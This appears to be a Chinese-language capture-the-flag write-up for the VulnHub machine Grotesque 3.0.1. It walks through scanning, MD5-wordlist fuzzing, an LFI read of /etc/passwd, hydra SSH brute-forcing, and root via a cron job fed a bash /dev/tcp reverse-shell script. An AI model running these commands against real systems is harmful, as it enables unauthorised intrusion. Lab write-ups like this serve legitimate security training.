Grotesque:3.0.1 vulnhub靶场(papy64，linpeas.sh)

kali攻击机ip：192.168.56.107

主机发现

arp-scan -I eth0 -l 

端口全扫描

nmap -sS -p-  -A 192.168.56.110

发现很常规的开放了22，80端口

web服务器为apache 2.4.38版本

我尝试searchspolit和查找cve，都没有发现可利用的漏洞

发现一张图片，暂时没发现有什么特别的

目录探测

还是常规的扫一波目录

dirb http://192.168.56.110    

一无所获

加上后缀扫

dirb http://192.168.56.110  -X .txt,.php,.zip

依旧一无所获

把页面图片都下载下来使用记事本查看源码

又双叒没发现 =_=

不信邪，回去再看看图片，这么大一个图片放着肯定有它的用意，不在源码，那就是图片本身了

放大观察，终于被我发现了地图上有md加五个X，说不定就是md5

md5字典爆破

这段代码摘自别的博主，因为我不会写=_=

for i in $(cat /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> dir.txt; done

cat dir.txt

发现字典后面跟着无关的两个空格一个"-"，需要手动删除

在vmware中点击文件，使用mousepad打开文件，点击图标中倒数第二个，查找并替换多余字符

使用ffuf再次探测目录

ffuf -w ./dir.txt -u http://192.168.56.110/FUZZ -e .txt,.php -mc 200   

发现.php文件

f66b22bf020334b04c7d0d3eb5010391.php

咦，啥也没有

源码也是空的

只能再看看是不是存在LFI

继续使用md5字典模糊测试，没有结果

因为这台kali是新弄的，没有下载字典，那就先尝试kali自带字典扫描

使用common.txt没结果

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://192.168.56.110/f66b22bf020334b04c7d0d3eb5010391.php/?FUZZ=../../../../etc/passwd  -fw 1 

改用big

ffuf -w /usr/share/wordlists/dirb/big.txt -u http://192.168.56.110/f66b22bf020334b04c7d0d3eb5010391.php/?FUZZ=../../../../etc/passwd  -fw 1 

有了！差点想去下载字典了

purpose

http://192.168.56.110/f66b22bf020334b04c7d0d3eb5010391.php/?purpose=../../../../etc/passwd

这个freddie的主目录在/home下，很有可能就是ssh远程登录的用户

没有密码提示，那就再试试md5字典爆破

hydra -l freddie -P dir.txt 192.168.56.110 ssh 

61a4e3e60c063d1e472dd780f64e6cad

ssh远程连接

ssh freddie@192.168.56.110

用户目录下发现flag

papy64和linpeas.sh下载

papy64下载地址

GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions

linpeas.sh下载地址

GitHub - carlospolop/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)

直接上传linpeas.sh和pspy64

kali攻击机开启htttp服务

python -m http.server 80

wget http://192.168.56.107/linpeas.sh 

wget http://192.168.56.107/pspy64

赋予执行权限

chmod 777 linpeas.sh

chmod 777 pspy64

./linpeas.sh 

没有找到有用信息，那就执行pspy64看看有没有定时任务

./pspy64

等待一会，发现uid=0的用户，也就是root，隔一会就会重复执行bash /smbshare/*，也就是/smbshare目录下的所有文件

可以访问/smbshare，而且该目录是空的

提权

既然如此，我们可以上传一个bash反弹shell到该目录，然后等待文件定时执行（不会使用vi，只能上传了）

#!/bin/bash

bash -i >& /dev/tcp/192.168.56.110/8888 0>&1

wget http://192.168.56.107:8888/shell.sh

无法直接写入shell.sh

想了想，这个目录名为/smbshare，或许跟445端口的smb服务有关

没有netstat命令，但还能使用ss

ss -lntp

可以看出开放了445端口，不知道为啥刚刚linpeas.sh没有扫出来

我还回去看了一遍，是真的没有，真不是我瞎

使用smbclient查看smb共享服务

smbclient -L 127.0.0.1

发现grotesque目录

上传shell.sh

cd ~
wget http://192.168.56.107:8888/shell.sh
chmod 777 shell.sh

像ftp一样使用smbclient

smbclient  -N //127.0.0.1/grotesque
put shell.sh

发现确实上传至/smbshare目录下了

kali开启监听

nc -lvp 8888

接下来就是等待root执行定时任务了

不想干等着，再次运行pspy64，发现已执行了shell.sh

回到nc界面，确实得到了反弹shell，而且是root权限的

得到flag

o了 😃